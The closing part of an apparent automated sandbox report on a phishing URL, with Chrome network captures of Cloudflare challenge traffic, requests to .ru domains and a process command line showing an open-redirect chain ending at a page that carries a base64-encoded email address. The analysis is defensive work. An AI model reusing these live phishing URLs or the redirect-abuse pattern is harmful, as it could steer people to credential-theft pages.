                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      Content-type: application/x-www-form-urlencoded
                                                                      CF-Chl-RetryAttempt: 0
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      CF-Challenge: RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Origin: https://challenges.cloudflare.com
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/mjn7o/0x4AAAAAAA2OtUsOMReD_Yux/auto/fbE/normal/auto/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:18 UTC16384OUTData Raw: 76 5f 38 66 65 32 39 31 32 65 66 39 39 34 37 63 65 32 3d 61 6a 57 56 6b 55 53 62 72 55 72 2d 57 2d 30 53 6d 65 57 56 78 6a 4c 51 34 63 53 4e 34 4d 56 50 57 2d 71 34 33 78 56 55 38 34 45 64 69 4e 34 24 56 6f 50 72 53 51 71 34 76 63 34 2d 4b 45 68 51 55 78 34 37 44 4b 56 34 66 56 65 30 34 47 70 54 53 57 34 46 56 6e 25 32 62 34 56 56 34 32 72 57 6e 62 4b 55 6f 54 75 41 4e 5a 4b 38 34 4a 4e 32 49 62 34 4b 38 53 31 62 78 46 51 56 53 69 4c 42 4b 53 63 76 71 38 34 6a 72 72 78 38 6e 36 4b 34 6e 35 65 24 34 4c 30 34 65 38 34 50 6e 4b 53 50 4f 4c 54 54 34 55 4d 59 6f 30 37 57 76 61 63 37 56 34 67 54 6f 78 2d 38 36 77 67 77 34 6e 61 6a 47 4c 49 74 6f 4e 52 34 53 35 61 56 24 71 41 76 53 34 79 77 62 39 31 75 57 41 6f 31 56 37 36 6d 69 42 65 78 4e 6d 45 46 56 64 50 54
                                                                      Data Ascii: v_8fe2912ef9947ce2=ajWVkUSbrUr-W-0SmeWVxjLQ4cSN4MVPW-q43xVU84EdiN4$VoPrSQq4vc4-KEhQUx47DKV4fVe04GpTSW4FVn%2b4VV42rWnbKUoTuANZK84JN2Ib4K8S1bxFQVSiLBKScvq84jrrx8n6K4n5e$4L04e84PnKSPOLTT4UMYo07Wvac7V4gTox-86wgw4najGLItoNR4S5aV$qAvS4ywb91uWAo1V76miBexNmEFVdPT
                                                                      2025-01-07 08:27:18 UTC16384OUTData Raw: 34 34 50 73 63 61 66 34 64 34 5a 72 4c 32 65 34 34 46 38 77 34 7a 6a 4d 73 37 72 6b 63 34 50 74 69 74 6a 56 34 74 37 50 34 55 57 34 6f 34 78 72 2d 72 34 79 56 65 4a 63 24 72 68 56 7a 4b 2d 43 34 48 30 7a 4d 55 36 34 4e 4b 30 4b 2d 51 34 4c 48 63 72 2d 36 34 77 61 4c 38 53 55 34 57 56 34 31 34 4a 6a 35 38 37 32 34 2b 34 24 4b 7a 4d 55 65 34 62 56 37 56 55 4d 34 30 34 6f 49 68 32 34 4a 46 78 35 45 6f 34 6d 56 78 72 55 45 34 78 56 4c 72 2d 68 56 50 34 7a 32 53 32 4b 5a 56 65 32 34 59 34 4d 56 57 6a 34 56 34 2d 30 77 62 53 52 53 43 6a 6f 39 73 70 34 6e 4b 61 56 34 5a 34 49 36 34 65 53 73 75 57 34 62 69 2d 56 53 31 34 55 57 2d 4b 53 51 34 79 39 56 30 34 63 34 79 57 56 35 55 6d 34 75 56 37 51 34 38 4b 65 56 65 46 30 78 34 62 57 2d 6d 34 37 56 4c 70 2d 31 34 31
                                                                      Data Ascii: 44Pscaf4d4ZrL2e44F8w4zjMs7rkc4PtitjV4t7P4UW4o4xr-r4yVeJc$rhVzK-C4H0zMU64NK0K-Q4LHcr-64waL8SU4WV414Jj58724+4$KzMUe4bV7VUM404oIh24JFx5Eo4mVxrUE4xVLr-hVP4z2S2KZVe24Y4MVWj4V4-0wbSRSCjo9sp4nKaV4Z4I64eSsuW4bi-VS14UW-KSQ4y9V04c4yWV5Um4uV7Q48KeVeF0x4bW-m47VLp-141
                                                                      2025-01-07 08:27:18 UTC2206OUTData Raw: 4c 46 44 34 6c 55 57 77 35 77 32 4b 66 36 75 62 53 2b 34 4e 75 44 4e 34 38 34 46 75 65 4a 6b 65 54 54 34 78 32 39 76 4a 55 56 30 6a 55 52 34 49 38 7a 34 55 39 34 6c 36 35 4d 4f 44 5a 4c 36 49 72 69 68 48 73 6a 57 56 55 35 4d 45 61 6f 72 67 54 6b 75 76 76 6a 56 57 34 70 63 71 77 65 5a 34 39 6a 31 54 2b 49 54 57 74 55 38 52 65 56 2d 61 6d 74 6e 52 34 72 56 7a 62 55 32 34 44 57 32 67 64 6b 4a 74 78 4d 57 39 4a 34 6f 56 57 77 39 4b 73 54 57 77 54 65 6b 6f 64 71 33 44 66 71 56 79 32 37 32 53 57 34 49 34 37 75 53 30 4a 62 56 30 56 67 54 56 57 2b 4d 32 6e 68 34 35 38 6f 57 55 36 47 57 62 6e 34 34 75 59 6d 61 6b 4e 66 4a 41 35 38 65 64 51 64 6b 65 51 55 6d 66 66 34 7a 56 4a 4b 53 6b 30 73 38 30 4b 2d 4f 34 6d 54 5a 57 53 31 34 49 36 6f 30 72 6f 34 37 53 54 4b 2d
                                                                      Data Ascii: LFD4lUWw5w2Kf6ubS+4NuDN484FueJkeTT4x29vJUV0jUR4I8z4U94l65MODZL6IrihHsjWVU5MEaorgTkuvvjVW4pcqweZ49j1T+ITWtU8ReV-amtnR4rVzbU24DW2gdkJtxMW9J4oVWw9KsTWwTekodq3DfqVy272SW4I47uS0JbV0VgTVW+M2nh458oWU6GWbn44uYmakNfJA58edQdkeQUmff4zVJKSk0s80K-O4mTZWS14I6o0ro47STK-
                                                                      2025-01-07 08:27:18 UTC274INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Content-Length: 4624
                                                                      Connection: close
                                                                      cf-chl-out: hc75amq97qruWgGMOarsd2ETGokexvMW93CaugzbD1ABKQ1Kj8eCtYUBRy1OumyUzzTah7PJQzjRWYWrtA7jYWofQXLphTrh9qWx5NZqnw==$egx4k/oWbhRTbfby
                                                                      2025-01-07 08:27:18 UTC1187INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 79 63 68 56 54 41 59 57 61 76 41 4a 4f 57 4c 78 72 4d 69 52 68 57 54 33 50 45 30 30 47 78 57 4a 32 59 76 2b 35 6f 6d 39 65 62 67 30 57 7a 78 63 5a 6b 34 48 5a 6b 49 62 4e 48 6f 34 33 76 32 54 4b 6f 2f 51 38 45 68 6f 4e 64 57 55 6a 59 62 2b 36 49 75 77 31 70 33 65 50 6c 4c 64 77 35 38 56 56 71 6f 57 64 59 47 2b 33 32 4f 49 77 4f 44 33 4b 55 4e 78 2f 58 47 4f 45 35 6c 74 6a 39 6e 66 6d 77 56 5a 6a 63 33 59 56 41 4f 6f 6d 4f 61 39 76 31 4b 6c 69 4e 6f 43 61 6e 71 4f 32 49 68 68 41 6d 49 47 73 57 4b 55 34 63 35 43 6e 32 56 4f 52 74 6a 74 52 6d 2f 38 67 78 55 36 6c 6f 50 6d 49 39 6b 59 33 53 33 66 46 6c 69 4e 70 43 2b 52 46 4c 4b 63 49 47 52 43 4a 4f 2f 5a 59 46 31 39 4f 39 37 59 6d 7a 48 69 32 4b 55 6d 56 53 4c 77 75
                                                                      Data Ascii: cf-chl-out-s: ychVTAYWavAJOWLxrMiRhWT3PE00GxWJ2Yv+5om9ebg0WzxcZk4HZkIbNHo43v2TKo/Q8EhoNdWUjYb+6Iuw1p3ePlLdw58VVqoWdYG+32OIwOD3KUNx/XGOE5ltj9nfmwVZjc3YVAOomOa9v1KliNoCanqO2IhhAmIGsWKU4c5Cn2VORtjtRm/8gxU6loPmI9kY3S3fFliNpC+RFLKcIGRCJO/ZYF19O97YmzHi2KUmVSLwu
                                                                      2025-01-07 08:27:18 UTC1277INData Raw: 66 37 2b 68 6a 37 79 33 67 35 69 69 70 73 61 61 70 4d 57 50 6d 38 7a 46 70 36 36 64 72 36 4b 59 6d 61 4b 58 33 4e 7a 66 7a 4c 2b 39 6e 4d 36 63 77 70 33 6f 34 61 6a 49 76 61 50 49 37 63 50 51 7a 50 48 48 34 4d 58 6f 74 75 58 4b 36 76 54 4b 79 64 33 37 34 4e 72 30 79 77 62 61 39 2b 44 54 32 64 58 68 41 67 63 4f 7a 63 4c 79 42 67 38 43 38 76 4d 57 36 67 34 62 32 76 62 36 46 50 41 42 2f 67 45 46 47 2b 54 68 37 2f 72 37 36 43 6b 47 4c 43 63 44 2f 54 49 65 41 77 51 30 49 51 67 6c 4b 76 41 51 4c 44 2f 38 4b 52 74 43 2f 68 34 45 2f 45 49 62 45 55 64 45 53 6b 6f 37 4a 7a 42 43 55 52 4a 4e 4c 56 52 41 45 79 45 6c 4e 78 67 32 4b 31 49 6f 54 32 4a 64 51 44 4a 65 4f 47 4e 47 4b 6c 73 6f 56 32 52 6f 4a 6b 31 49 54 6c 52 30 59 6c 64 59 52 55 74 4e 66 55 35 34 5a 33 5a
                                                                      Data Ascii: f7+hj7y3g5iipsaapMWPm8zFp66dr6KYmaKX3NzfzL+9nM6cwp3o4ajIvaPI7cPQzPHH4MXotuXK6vTKyd374Nr0ywba9+DT2dXhAgcOzcLyBg8C8vMW6g4b2vb6FPAB/gEFG+Th7/r76CkGLCcD/TIeAwQ0IQglKvAQLD/8KRtC/h4E/EIbEUdESko7JzBCURJNLVRAEyElNxg2K1IoT2JdQDJeOGNGKlsoV2RoJk1ITlR0YldYRUtNfU54Z3Z
                                                                      2025-01-07 08:27:18 UTC1369INData Raw: 30 78 38 63 58 64 59 4f 6e 4e 61 66 6d 64 73 56 32 78 4f 65 32 39 6f 6a 33 4f 4b 68 32 74 35 65 58 46 31 69 46 61 61 66 49 31 76 59 36 53 50 59 47 53 41 68 6e 74 39 68 4a 32 6c 66 59 57 68 62 59 65 73 6e 70 53 6d 75 4a 69 77 69 4b 69 76 6a 5a 78 33 6c 5a 47 4c 77 72 57 55 77 61 57 78 6d 5a 32 69 71 72 37 4b 72 4c 79 69 6a 74 44 41 70 5a 4f 56 71 37 71 54 79 4d 62 54 70 39 33 4e 73 72 66 6a 7a 74 61 6e 33 73 62 48 31 38 4c 4b 7a 4f 4c 64 32 75 69 38 37 74 54 56 72 37 4c 58 32 4f 2f 53 30 4f 36 2f 34 4e 34 44 76 37 33 31 43 4e 48 51 35 38 4d 4c 44 74 2f 49 78 77 30 45 34 67 7a 71 42 76 50 54 46 41 7a 35 31 4f 66 38 46 41 6a 34 45 67 4c 34 48 42 4c 68 49 69 6b 48 34 75 63 4a 46 77 77 6e 45 41 55 6b 41 67 38 6f 42 66 41 53 49 2f 51 37 4a 69 62 32 4f 2f 6b 56
                                                                      Data Ascii: 0x8cXdYOnNafmdsV2xOe29oj3OKh2t5eXF1iFaafI1vY6SPYGSAhnt9hJ2lfYWhbYesnpSmuJiwiKivjZx3lZGLwrWUwaWxmZ2iqr7KrLyijtDApZOVq7qTyMbTp93Nsrfjztan3sbH18LKzOLd2ui87tTVr7LX2O/S0O6/4N4Dv731CNHQ58MLDt/Ixw0E4gzqBvPTFAz51Of8FAj4EgL4HBLhIikH4ucJFwwnEAUkAg8oBfASI/Q7Jib2O/kV
                                                                      2025-01-07 08:27:18 UTC1369INData Raw: 53 44 67 6f 4d 2f 52 49 68 4b 58 57 70 6a 58 45 65 54 54 6d 78 68 67 35 42 61 58 5a 74 5a 58 56 4f 51 63 6c 39 62 70 48 4f 51 66 46 79 64 67 4b 56 34 5a 72 43 47 6e 49 4f 47 66 36 4b 66 64 72 4f 56 69 34 75 64 64 33 76 41 73 4a 2b 6b 76 37 42 2f 66 38 43 71 67 37 36 30 76 71 7a 46 78 35 76 41 79 4e 47 4c 78 4e 4b 6a 72 61 76 49 6d 63 37 57 6d 36 32 32 72 73 43 34 75 74 33 64 73 74 61 6d 77 36 58 46 34 4c 69 37 79 50 50 69 77 38 76 4c 72 64 62 47 78 76 7a 57 39 66 33 70 38 72 50 79 2f 65 58 7a 77 4f 4d 43 35 73 54 62 43 66 72 75 43 4e 7a 75 42 67 4d 51 36 51 66 4f 2b 41 72 56 30 39 59 49 31 76 6e 74 2f 74 33 30 46 52 63 59 39 42 58 38 34 2f 54 6e 48 69 2f 6d 49 69 45 44 2f 42 55 66 46 65 38 31 44 69 38 49 4f 43 6b 64 43 54 45 7a 4f 41 54 39 49 77 45 6b 4f
                                                                      Data Ascii: SDgoM/RIhKXWpjXEeTTmxhg5BaXZtZXVOQcl9bpHOQfFydgKV4ZrCGnIOGf6KfdrOVi4udd3vAsJ+kv7B/f8Cqg760vqzFx5vAyNGLxNKjravImc7Wm622rsC4ut3dstamw6XF4Li7yPPiw8vLrdbGxvzW9f3p8rPy/eXzwOMC5sTbCfruCNzuBgMQ6QfO+ArV09YI1vnt/t30FRcY9BX84/TnHi/mIiED/BUfFe81Di8IOCkdCTEzOAT9IwEkO
                                                                      2025-01-07 08:27:18 UTC609INData Raw: 42 63 6e 4b 53 67 58 52 52 59 45 35 73 5a 31 74 38 63 46 61 53 6f 49 31 77 66 46 32 4e 58 33 53 6b 6d 49 71 6e 68 4a 68 6f 61 49 65 66 70 6f 52 6d 6b 58 47 41 70 71 75 61 6b 37 57 75 6e 70 57 5a 6e 70 4f 4d 73 4a 65 42 6b 5a 4f 63 71 4a 53 36 76 73 50 47 6a 4c 48 4a 6e 4e 47 6e 31 71 32 6b 74 37 66 4b 6b 71 75 6f 32 74 37 4f 32 4b 2f 6b 78 4c 61 38 78 38 62 67 34 38 54 41 76 73 6a 73 30 72 32 2f 39 4e 57 78 72 2b 54 71 78 4c 65 75 36 76 54 50 2f 74 58 4d 32 2f 62 32 35 67 66 70 39 77 44 70 32 66 73 44 33 2f 41 45 43 41 63 47 39 65 55 45 36 67 62 30 30 77 6b 4a 32 41 2f 67 45 42 63 65 49 78 66 76 47 78 59 59 43 4f 73 63 47 43 55 42 37 43 49 6d 36 7a 41 58 41 66 4d 31 4c 44 48 79 4c 69 2f 32 39 6a 73 65 2f 54 73 45 46 43 45 45 4e 43 6f 59 43 7a 38 68 47 68
                                                                      Data Ascii: BcnKSgXRRYE5sZ1t8cFaSoI1wfF2NX3SkmIqnhJhoaIefpoRmkXGApquak7WunpWZnpOMsJeBkZOcqJS6vsPGjLHJnNGn1q2kt7fKkquo2t7O2K/kxLa8x8bg48TAvsjs0r2/9NWxr+TqxLeu6vTP/tXM2/b25gfp9wDp2fsD3/AECAcG9eUE6gb00wkJ2A/gEBceIxfvGxYYCOscGCUB7CIm6zAXAfM1LDHyLi/29jse/TsEFCEENCoYCz8hGh


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.1649745104.18.94.414436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:18 UTC597OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/66560694:1736234662:g2tTdhX1N4yQAMduBmEPcwG9Jve5D0zcYbutF1fAQHw/8fe2912ef9947ce2/RbQkraW63v_SNEukALAU7BXWI3qRRiLIwjVM5tIrraQ-1736238430-1.1.1.1-Ed8FZ3WJviBCzb2N6uYl04L6Z4cizB5OXCLfJ8bmEjw8ybsWLhdpWyjuoDzkj_mq HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:18 UTC379INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 07 Jan 2025 08:27:18 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 7
                                                                      Connection: close
                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      cf-chl-out: 62ofX+a0BCpGWiiaqdFv5q2CbYy055CbR44=$oo56G6lDg7ySVHCX
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe29162de11c431-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-01-07 08:27:18 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                      Data Ascii: invalid


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.1649747104.21.42.2084436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:19 UTC673OUTGET /ItjnOrQFuqAwfUMRPcpijOHMGRTPXRGRZFXLIWPJUHDRHTAXAFCEEPIPRAIGIVWFSPLFFYUPBMOFHWRLVOOE HTTP/1.1
                                                                      Host: urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Origin: https://y7.novenef.ru
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Referer: https://y7.novenef.ru/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:19 UTC892INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Access-Control-Allow-Origin: *
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uPrdMikP3xgwwXnTooUmTQIKkH%2FS61G24t3xHUFUQJnPj029W2mJxokAGxEz93dr9ddGwPZ%2FZYmMcpczRnKvfMjY72yJbe7oljNQbNIounBWDRzgZWu9BoF9TEikL1ajkeuQF6TtMoTfm7mi3rfvKdoB6MCJdVIw%2BmNYWBawicAH8s8zGlApKnbggOctO4zuPmcL%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe29166b9764372-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2406&min_rtt=2403&rtt_var=908&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1251&delivery_rate=1200657&cwnd=242&unsent_bytes=0&cid=ed2b35472d64c1f2&ts=558&x=0"
                                                                      2025-01-07 08:27:19 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                      Data Ascii: 11
                                                                      2025-01-07 08:27:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.1649751104.21.42.2084436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:21 UTC473OUTGET /ItjnOrQFuqAwfUMRPcpijOHMGRTPXRGRZFXLIWPJUHDRHTAXAFCEEPIPRAIGIVWFSPLFFYUPBMOFHWRLVOOE HTTP/1.1
                                                                      Host: urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:21 UTC894INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Access-Control-Allow-Origin: *
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uIAjSVepeAQWKnl5FFhp0keSKt8JzXrzpf1stiLVVUVh7MKFhZqmbHog0Z5lFt6rQpkYUMd5sc21Kxp1iTxTBoDvE1pcSQEah%2FqKge7e7K6ocFthiU5O7YQDvtPDZj2AYNfIzmTnJukKoDf20X%2BY95hmNYhrlByqFWESNgZ%2FDFVIlHuZ4AEJcq8pZJ7Y2cC5i%2Bj%2FTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fe29170e8334407-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1742&rtt_var=671&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1051&delivery_rate=1608815&cwnd=230&unsent_bytes=0&cid=1c135e74f4498001&ts=557&x=0"
                                                                      2025-01-07 08:27:21 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                      Data Ascii: 11
                                                                      2025-01-07 08:27:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:03:26:59
                                                                      Start date:07/01/2025
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                      Imagebase:0x7ff7f9810000
                                                                      File size:3'242'272 bytes
                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:1
                                                                      Start time:03:27:00
                                                                      Start date:07/01/2025
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1948,i,14907547399689910483,310320339448352064,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                      Imagebase:0x7ff7f9810000
                                                                      File size:3'242'272 bytes
                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:2
                                                                      Start time:03:27:01
                                                                      Start date:07/01/2025
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo"
                                                                      Imagebase:0x7ff7f9810000
                                                                      File size:3'242'272 bytes
                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      No disassembly